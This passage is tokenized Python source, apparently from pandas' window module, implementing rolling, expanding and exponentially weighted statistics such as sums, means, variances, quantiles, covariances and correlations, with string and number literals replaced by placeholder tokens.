ndim - <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> from pandas import Series , DataFrame <EOL> offset = _offset ( window , True ) <EOL> if offset > <NUM_LIT:0> : <EOL> if isinstance ( result , ( Series , DataFrame ) ) : <EOL> result = result . slice_shift ( - offset , axis = self . axis ) <EOL> else : <EOL> lead_indexer = [ slice ( None ) ] * result . ndim <EOL> lead_indexer [ self . axis ] = slice ( offset , None ) <EOL> result = np . copy ( result [ tuple ( lead_indexer ) ] ) <EOL> return result <EOL> def aggregate ( self , arg , * args , ** kwargs ) : <EOL> result , how = self . _aggregate ( arg , * args , ** kwargs ) <EOL> if result is None : <EOL> return self . apply ( arg , args = args , kwargs = kwargs ) <EOL> return result <EOL> agg = aggregate <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> class Window ( _Window ) : <EOL> """<STR_LIT>""" <EOL> def validate ( self ) : <EOL> super ( Window , self ) . validate ( ) <EOL> window = self . window <EOL> if isinstance ( window , ( list , tuple , np . ndarray ) ) : <EOL> pass <EOL> elif com . is_integer ( window ) : <EOL> try : <EOL> import scipy . signal as sig <EOL> except ImportError : <EOL> raise ImportError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not isinstance ( self . win_type , compat . string_types ) : <EOL> raise ValueError ( '<STR_LIT>' . format ( self . win_type ) ) <EOL> if getattr ( sig , self . win_type , None ) is None : <EOL> raise ValueError ( '<STR_LIT>' . format ( self . win_type ) ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' . format ( window ) ) <EOL> def _prep_window ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> window = self . _get_window ( ) <EOL> if isinstance ( window , ( list , tuple , np . ndarray ) ) : <EOL> return com . _asarray_tuplesafe ( window ) . astype ( float ) <EOL> elif com . is_integer ( window ) : <EOL> import scipy . 
signal as sig <EOL> def _validate_win_type ( win_type , kwargs ) : <EOL> arg_map = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT:width>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:width>' ] } <EOL> if win_type in arg_map : <EOL> return tuple ( [ win_type ] + _pop_args ( win_type , <EOL> arg_map [ win_type ] , <EOL> kwargs ) ) <EOL> return win_type <EOL> def _pop_args ( win_type , arg_names , kwargs ) : <EOL> msg = '<STR_LIT>' % win_type <EOL> all_args = [ ] <EOL> for n in arg_names : <EOL> if n not in kwargs : <EOL> raise ValueError ( msg % n ) <EOL> all_args . append ( kwargs . pop ( n ) ) <EOL> return all_args <EOL> win_type = _validate_win_type ( self . win_type , kwargs ) <EOL> return sig . get_window ( win_type , window ) . astype ( float ) <EOL> def _apply_window ( self , mean = True , how = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> window = self . _prep_window ( ** kwargs ) <EOL> center = self . center <EOL> blocks , obj = self . _create_blocks ( how = how ) <EOL> results = [ ] <EOL> for b in blocks : <EOL> try : <EOL> values = self . _prep_values ( b . values ) <EOL> except TypeError : <EOL> results . append ( b . values . copy ( ) ) <EOL> continue <EOL> if values . size == <NUM_LIT:0> : <EOL> results . append ( values . copy ( ) ) <EOL> continue <EOL> offset = _offset ( window , center ) <EOL> additional_nans = np . array ( [ np . NaN ] * offset ) <EOL> def f ( arg , * args , ** kwargs ) : <EOL> minp = _use_window ( self . min_periods , len ( window ) ) <EOL> return algos . roll_window ( np . concatenate ( ( arg , additional_nans ) ) <EOL> if center else arg , window , minp , <EOL> avg = mean ) <EOL> result = np . apply_along_axis ( f , self . axis , values ) <EOL> if center : <EOL> result = self . _center_window ( result , window ) <EOL> results . append ( result ) <EOL> return self . 
_wrap_results ( results , blocks , obj ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( SelectionMixin . _see_also_template ) <EOL> @ Appender ( SelectionMixin . _agg_doc ) <EOL> def aggregate ( self , arg , * args , ** kwargs ) : <EOL> result , how = self . _aggregate ( arg , * args , ** kwargs ) <EOL> if result is None : <EOL> result = arg ( self ) <EOL> return result <EOL> agg = aggregate <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def sum ( self , ** kwargs ) : <EOL> return self . _apply_window ( mean = False , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def mean ( self , ** kwargs ) : <EOL> return self . _apply_window ( mean = True , ** kwargs ) <EOL> class _GroupByMixin ( GroupByMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , obj , * args , ** kwargs ) : <EOL> parent = kwargs . pop ( '<STR_LIT>' , None ) <EOL> groupby = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if groupby is None : <EOL> groupby , obj = obj , obj . obj <EOL> self . _groupby = groupby <EOL> self . _groupby . mutated = True <EOL> self . _groupby . grouper . mutated = True <EOL> super ( GroupByMixin , self ) . __init__ ( obj , * args , ** kwargs ) <EOL> count = GroupByMixin . _dispatch ( '<STR_LIT:count>' ) <EOL> corr = GroupByMixin . _dispatch ( '<STR_LIT>' , other = None , pairwise = None ) <EOL> cov = GroupByMixin . _dispatch ( '<STR_LIT>' , other = None , pairwise = None ) <EOL> def _apply ( self , func , name , window = None , center = None , <EOL> check_minp = None , how = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> def f ( x , name = name , * args ) : <EOL> x = self . _shallow_copy ( x ) <EOL> if isinstance ( name , compat . string_types ) : <EOL> return getattr ( x , name ) ( * args , ** kwargs ) <EOL> return x . 
apply ( name , * args , ** kwargs ) <EOL> return self . _groupby . apply ( f ) <EOL> class _Rolling ( _Window ) : <EOL> @ property <EOL> def _constructor ( self ) : <EOL> return Rolling <EOL> def _apply ( self , func , name = None , window = None , center = None , <EOL> check_minp = None , how = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if center is None : <EOL> center = self . center <EOL> if window is None : <EOL> window = self . _get_window ( ) <EOL> if check_minp is None : <EOL> check_minp = _use_window <EOL> blocks , obj = self . _create_blocks ( how = how ) <EOL> results = [ ] <EOL> for b in blocks : <EOL> try : <EOL> values = self . _prep_values ( b . values ) <EOL> except TypeError : <EOL> results . append ( b . values . copy ( ) ) <EOL> continue <EOL> if values . size == <NUM_LIT:0> : <EOL> results . append ( values . copy ( ) ) <EOL> continue <EOL> if isinstance ( func , compat . string_types ) : <EOL> if not hasattr ( algos , func ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( func ) ) <EOL> cfunc = getattr ( algos , func ) <EOL> def func ( arg , window , min_periods = None ) : <EOL> minp = check_minp ( min_periods , window ) <EOL> return cfunc ( com . _ensure_float64 ( arg ) , <EOL> window , minp , ** kwargs ) <EOL> if center : <EOL> offset = _offset ( window , center ) <EOL> additional_nans = np . array ( [ np . NaN ] * offset ) <EOL> def calc ( x ) : <EOL> return func ( np . concatenate ( ( x , additional_nans ) ) , <EOL> window , min_periods = self . min_periods ) <EOL> else : <EOL> def calc ( x ) : <EOL> return func ( x , window , min_periods = self . min_periods ) <EOL> if values . ndim > <NUM_LIT:1> : <EOL> result = np . apply_along_axis ( calc , self . axis , values ) <EOL> else : <EOL> result = calc ( values ) <EOL> if center : <EOL> result = self . _center_window ( result , window ) <EOL> results . append ( result ) <EOL> return self . 
_wrap_results ( results , blocks , obj ) <EOL> class _Rolling_and_Expanding ( _Rolling ) : <EOL> _shared_docs [ '<STR_LIT:count>' ] = """<STR_LIT>""" <EOL> def count ( self ) : <EOL> obj = self . _convert_freq ( ) <EOL> window = self . _get_window ( ) <EOL> window = min ( window , len ( obj ) ) if not self . center else window <EOL> blocks , obj = self . _create_blocks ( how = None ) <EOL> results = [ ] <EOL> for b in blocks : <EOL> if com . needs_i8_conversion ( b . values ) : <EOL> result = b . notnull ( ) . astype ( int ) <EOL> else : <EOL> try : <EOL> result = np . isfinite ( b ) . astype ( float ) <EOL> except TypeError : <EOL> result = np . isfinite ( b . astype ( float ) ) . astype ( float ) <EOL> result [ pd . isnull ( result ) ] = <NUM_LIT:0> <EOL> result = self . _constructor ( result , window = window , min_periods = <NUM_LIT:0> , <EOL> center = self . center ) . sum ( ) <EOL> results . append ( result ) <EOL> return self . _wrap_results ( results , blocks , obj ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def apply ( self , func , args = ( ) , kwargs = { } ) : <EOL> _level = kwargs . pop ( '<STR_LIT>' , None ) <EOL> window = self . _get_window ( ) <EOL> offset = _offset ( window , self . center ) <EOL> def f ( arg , window , min_periods ) : <EOL> minp = _use_window ( min_periods , window ) <EOL> return algos . roll_generic ( arg , window , minp , offset , func , args , <EOL> kwargs ) <EOL> return self . _apply ( f , func , args = args , kwargs = kwargs , <EOL> center = False ) <EOL> def sum ( self , ** kwargs ) : <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def max ( self , how = None , ** kwargs ) : <EOL> if self . freq is not None and how is None : <EOL> how = '<STR_LIT>' <EOL> return self . 
_apply ( '<STR_LIT>' , '<STR_LIT>' , how = how , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def min ( self , how = None , ** kwargs ) : <EOL> if self . freq is not None and how is None : <EOL> how = '<STR_LIT>' <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , how = how , ** kwargs ) <EOL> def mean ( self , ** kwargs ) : <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def median ( self , how = None , ** kwargs ) : <EOL> if self . freq is not None and how is None : <EOL> how = '<STR_LIT>' <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , how = how , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def std ( self , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> window = self . _get_window ( ) <EOL> def f ( arg , * args , ** kwargs ) : <EOL> minp = _require_min_periods ( <NUM_LIT:1> ) ( self . min_periods , window ) <EOL> return _zsqrt ( algos . roll_var ( arg , window , minp , ddof ) ) <EOL> return self . _apply ( f , '<STR_LIT>' , check_minp = _require_min_periods ( <NUM_LIT:1> ) , <EOL> ddof = ddof , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def var ( self , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , <EOL> check_minp = _require_min_periods ( <NUM_LIT:1> ) , ddof = ddof , <EOL> ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = """<STR_LIT>""" <EOL> def skew ( self , ** kwargs ) : <EOL> return self . _apply ( '<STR_LIT>' , '<STR_LIT>' , <EOL> check_minp = _require_min_periods ( <NUM_LIT:3> ) , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = """<STR_LIT>""" <EOL> def kurt ( self , ** kwargs ) : <EOL> return self . 
_apply ( '<STR_LIT>' , '<STR_LIT>' , <EOL> check_minp = _require_min_periods ( <NUM_LIT:4> ) , ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def quantile ( self , quantile , ** kwargs ) : <EOL> window = self . _get_window ( ) <EOL> def f ( arg , * args , ** kwargs ) : <EOL> minp = _use_window ( self . min_periods , window ) <EOL> return algos . roll_quantile ( arg , window , minp , quantile ) <EOL> return self . _apply ( f , '<STR_LIT>' , quantile = quantile , <EOL> ** kwargs ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def cov ( self , other = None , pairwise = None , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> if other is None : <EOL> other = self . _selected_obj <EOL> pairwise = True if pairwise is None else pairwise <EOL> other = self . _shallow_copy ( other ) <EOL> window = self . _get_window ( other ) <EOL> def _get_cov ( X , Y ) : <EOL> X = X . astype ( '<STR_LIT>' ) <EOL> Y = Y . astype ( '<STR_LIT>' ) <EOL> mean = lambda x : x . rolling ( window , self . min_periods , <EOL> center = self . center ) . mean ( ** kwargs ) <EOL> count = ( X + Y ) . rolling ( window = window , <EOL> center = self . center ) . count ( ** kwargs ) <EOL> bias_adj = count / ( count - ddof ) <EOL> return ( mean ( X * Y ) - mean ( X ) * mean ( Y ) ) * bias_adj <EOL> return _flex_binary_moment ( self . _selected_obj , other . _selected_obj , <EOL> _get_cov , pairwise = bool ( pairwise ) ) <EOL> _shared_docs [ '<STR_LIT>' ] = dedent ( """<STR_LIT>""" ) <EOL> def corr ( self , other = None , pairwise = None , ** kwargs ) : <EOL> if other is None : <EOL> other = self . _selected_obj <EOL> pairwise = True if pairwise is None else pairwise <EOL> other = self . _shallow_copy ( other ) <EOL> window = self . _get_window ( other ) <EOL> def _get_corr ( a , b ) : <EOL> a = a . rolling ( window = window , min_periods = self . min_periods , <EOL> freq = self . freq , center = self . center ) <EOL> b = b . 
rolling ( window = window , min_periods = self . min_periods , <EOL> freq = self . freq , center = self . center ) <EOL> return a . cov ( b , ** kwargs ) / ( a . std ( ** kwargs ) * b . std ( ** kwargs ) ) <EOL> return _flex_binary_moment ( self . _selected_obj , other . _selected_obj , <EOL> _get_corr , pairwise = bool ( pairwise ) ) <EOL> class Rolling ( _Rolling_and_Expanding ) : <EOL> """<STR_LIT>""" <EOL> def validate ( self ) : <EOL> super ( Rolling , self ) . validate ( ) <EOL> if not com . is_integer ( self . window ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( SelectionMixin . _see_also_template ) <EOL> @ Appender ( SelectionMixin . _agg_doc ) <EOL> def aggregate ( self , arg , * args , ** kwargs ) : <EOL> return super ( Rolling , self ) . aggregate ( arg , * args , ** kwargs ) <EOL> agg = aggregate <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT:count>' ] ) <EOL> def count ( self ) : <EOL> return super ( Rolling , self ) . count ( ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def apply ( self , func , args = ( ) , kwargs = { } ) : <EOL> return super ( Rolling , self ) . apply ( func , args = args , kwargs = kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def sum ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . sum ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def max ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . 
max ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def min ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . min ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def mean ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . mean ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def median ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . median ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def std ( self , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return super ( Rolling , self ) . std ( ddof = ddof , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def var ( self , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return super ( Rolling , self ) . var ( ddof = ddof , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def skew ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . skew ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def kurt ( self , ** kwargs ) : <EOL> return super ( Rolling , self ) . kurt ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def quantile ( self , quantile , ** kwargs ) : <EOL> return super ( Rolling , self ) . 
quantile ( quantile = quantile , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def cov ( self , other = None , pairwise = None , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return super ( Rolling , self ) . cov ( other = other , pairwise = pairwise , <EOL> ddof = ddof , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def corr ( self , other = None , pairwise = None , ** kwargs ) : <EOL> return super ( Rolling , self ) . corr ( other = other , pairwise = pairwise , <EOL> ** kwargs ) <EOL> class RollingGroupby ( _GroupByMixin , Rolling ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def _constructor ( self ) : <EOL> return Rolling <EOL> class Expanding ( _Rolling_and_Expanding ) : <EOL> """<STR_LIT>""" <EOL> _attributes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , obj , min_periods = <NUM_LIT:1> , freq = None , center = False , axis = <NUM_LIT:0> , <EOL> ** kwargs ) : <EOL> return super ( Expanding , self ) . __init__ ( obj = obj , <EOL> min_periods = min_periods , <EOL> freq = freq , center = center , <EOL> axis = axis ) <EOL> @ property <EOL> def _constructor ( self ) : <EOL> return Expanding <EOL> def _get_window ( self , other = None ) : <EOL> obj = self . _selected_obj <EOL> if other is None : <EOL> return ( max ( len ( obj ) , self . min_periods ) if self . min_periods <EOL> else len ( obj ) ) <EOL> return ( max ( ( len ( obj ) + len ( obj ) ) , self . min_periods ) <EOL> if self . min_periods else ( len ( obj ) + len ( obj ) ) ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( SelectionMixin . _see_also_template ) <EOL> @ Appender ( SelectionMixin . _agg_doc ) <EOL> def aggregate ( self , arg , * args , ** kwargs ) : <EOL> return super ( Expanding , self ) . 
aggregate ( arg , * args , ** kwargs ) <EOL> agg = aggregate <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT:count>' ] ) <EOL> def count ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . count ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def apply ( self , func , args = ( ) , kwargs = { } ) : <EOL> return super ( Expanding , self ) . apply ( func , args = args , kwargs = kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def sum ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . sum ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def max ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . max ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def min ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . min ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def mean ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . mean ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def median ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . median ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def std ( self , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return super ( Expanding , self ) . 
std ( ddof = ddof , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def var ( self , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return super ( Expanding , self ) . var ( ddof = ddof , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def skew ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . skew ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def kurt ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . kurt ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def quantile ( self , quantile , ** kwargs ) : <EOL> return super ( Expanding , self ) . quantile ( quantile = quantile , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def cov ( self , other = None , pairwise = None , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return super ( Expanding , self ) . cov ( other = other , pairwise = pairwise , <EOL> ddof = ddof , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def corr ( self , other = None , pairwise = None , ** kwargs ) : <EOL> return super ( Expanding , self ) . 
corr ( other = other , pairwise = pairwise , <EOL> ** kwargs ) <EOL> class ExpandingGroupby ( _GroupByMixin , Expanding ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def _constructor ( self ) : <EOL> return Expanding <EOL> _bias_template = """<STR_LIT>""" <EOL> _pairwise_template = """<STR_LIT>""" <EOL> class EWM ( _Rolling ) : <EOL> r"""<STR_LIT>""" <EOL> _attributes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , obj , com = None , span = None , halflife = None , alpha = None , <EOL> min_periods = <NUM_LIT:0> , freq = None , adjust = True , ignore_na = False , <EOL> axis = <NUM_LIT:0> ) : <EOL> self . obj = obj <EOL> self . com = _get_center_of_mass ( com , span , halflife , alpha ) <EOL> self . min_periods = min_periods <EOL> self . freq = freq <EOL> self . adjust = adjust <EOL> self . ignore_na = ignore_na <EOL> self . axis = axis <EOL> @ property <EOL> def _constructor ( self ) : <EOL> return EWM <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( SelectionMixin . _see_also_template ) <EOL> @ Appender ( SelectionMixin . _agg_doc ) <EOL> def aggregate ( self , arg , * args , ** kwargs ) : <EOL> return super ( EWM , self ) . aggregate ( arg , * args , ** kwargs ) <EOL> agg = aggregate <EOL> def _apply ( self , func , how = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> blocks , obj = self . _create_blocks ( how = how ) <EOL> results = [ ] <EOL> for b in blocks : <EOL> try : <EOL> values = self . _prep_values ( b . values ) <EOL> except TypeError : <EOL> results . append ( b . values . copy ( ) ) <EOL> continue <EOL> if values . size == <NUM_LIT:0> : <EOL> results . append ( values . copy ( ) ) <EOL> continue <EOL> if isinstance ( func , compat . string_types ) : <EOL> if not hasattr ( algos , func ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( func ) ) <EOL> cfunc = getattr ( algos , func ) <EOL> def func ( arg ) : <EOL> return cfunc ( arg , self . 
com , int ( self . adjust ) , <EOL> int ( self . ignore_na ) , int ( self . min_periods ) ) <EOL> results . append ( np . apply_along_axis ( func , self . axis , values ) ) <EOL> return self . _wrap_results ( results , blocks , obj ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> def mean ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . _apply ( '<STR_LIT>' , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _bias_template ) <EOL> def std ( self , bias = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return _zsqrt ( self . var ( bias = bias , ** kwargs ) ) <EOL> vol = std <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _bias_template ) <EOL> def var ( self , bias = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> def f ( arg ) : <EOL> return algos . ewmcov ( arg , arg , self . com , int ( self . adjust ) , <EOL> int ( self . ignore_na ) , int ( self . min_periods ) , <EOL> int ( bias ) ) <EOL> return self . _apply ( f , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _pairwise_template ) <EOL> def cov ( self , other = None , pairwise = None , bias = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if other is None : <EOL> other = self . _selected_obj <EOL> pairwise = True if pairwise is None else pairwise <EOL> other = self . _shallow_copy ( other ) <EOL> def _get_cov ( X , Y ) : <EOL> X = self . _shallow_copy ( X ) <EOL> Y = self . _shallow_copy ( Y ) <EOL> cov = algos . ewmcov ( X . _prep_values ( ) , Y . _prep_values ( ) , self . com , <EOL> int ( self . adjust ) , int ( self . ignore_na ) , <EOL> int ( self . min_periods ) , int ( bias ) ) <EOL> return X . _wrap_result ( cov ) <EOL> return _flex_binary_moment ( self . _selected_obj , other . 
_selected_obj , <EOL> _get_cov , pairwise = bool ( pairwise ) ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _pairwise_template ) <EOL> def corr ( self , other = None , pairwise = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if other is None : <EOL> other = self . _selected_obj <EOL> pairwise = True if pairwise is None else pairwise <EOL> other = self . _shallow_copy ( other ) <EOL> def _get_corr ( X , Y ) : <EOL> X = self . _shallow_copy ( X ) <EOL> Y = self . _shallow_copy ( Y ) <EOL> def _cov ( x , y ) : <EOL> return algos . ewmcov ( x , y , self . com , int ( self . adjust ) , <EOL> int ( self . ignore_na ) , int ( self . min_periods ) , <EOL> <NUM_LIT:1> ) <EOL> x_values = X . _prep_values ( ) <EOL> y_values = Y . _prep_values ( ) <EOL> cov = _cov ( x_values , y_values ) <EOL> x_var = _cov ( x_values , x_values ) <EOL> y_var = _cov ( y_values , y_values ) <EOL> corr = cov / _zsqrt ( x_var * y_var ) <EOL> return X . _wrap_result ( corr ) <EOL> return _flex_binary_moment ( self . _selected_obj , other . _selected_obj , <EOL> _get_corr , pairwise = bool ( pairwise ) ) <EOL> def _flex_binary_moment ( arg1 , arg2 , f , pairwise = False ) : <EOL> from pandas import Series , DataFrame , Panel <EOL> if not ( isinstance ( arg1 , ( np . ndarray , Series , DataFrame ) ) and <EOL> isinstance ( arg2 , ( np . ndarray , Series , DataFrame ) ) ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if ( isinstance ( arg1 , ( np . ndarray , Series ) ) and <EOL> isinstance ( arg2 , ( np . ndarray , Series ) ) ) : <EOL> X , Y = _prep_binary ( arg1 , arg2 ) <EOL> return f ( X , Y ) <EOL> elif isinstance ( arg1 , DataFrame ) : <EOL> def dataframe_from_int_dict ( data , frame_template ) : <EOL> result = DataFrame ( data , index = frame_template . index ) <EOL> if len ( result . columns ) > <NUM_LIT:0> : <EOL> result . 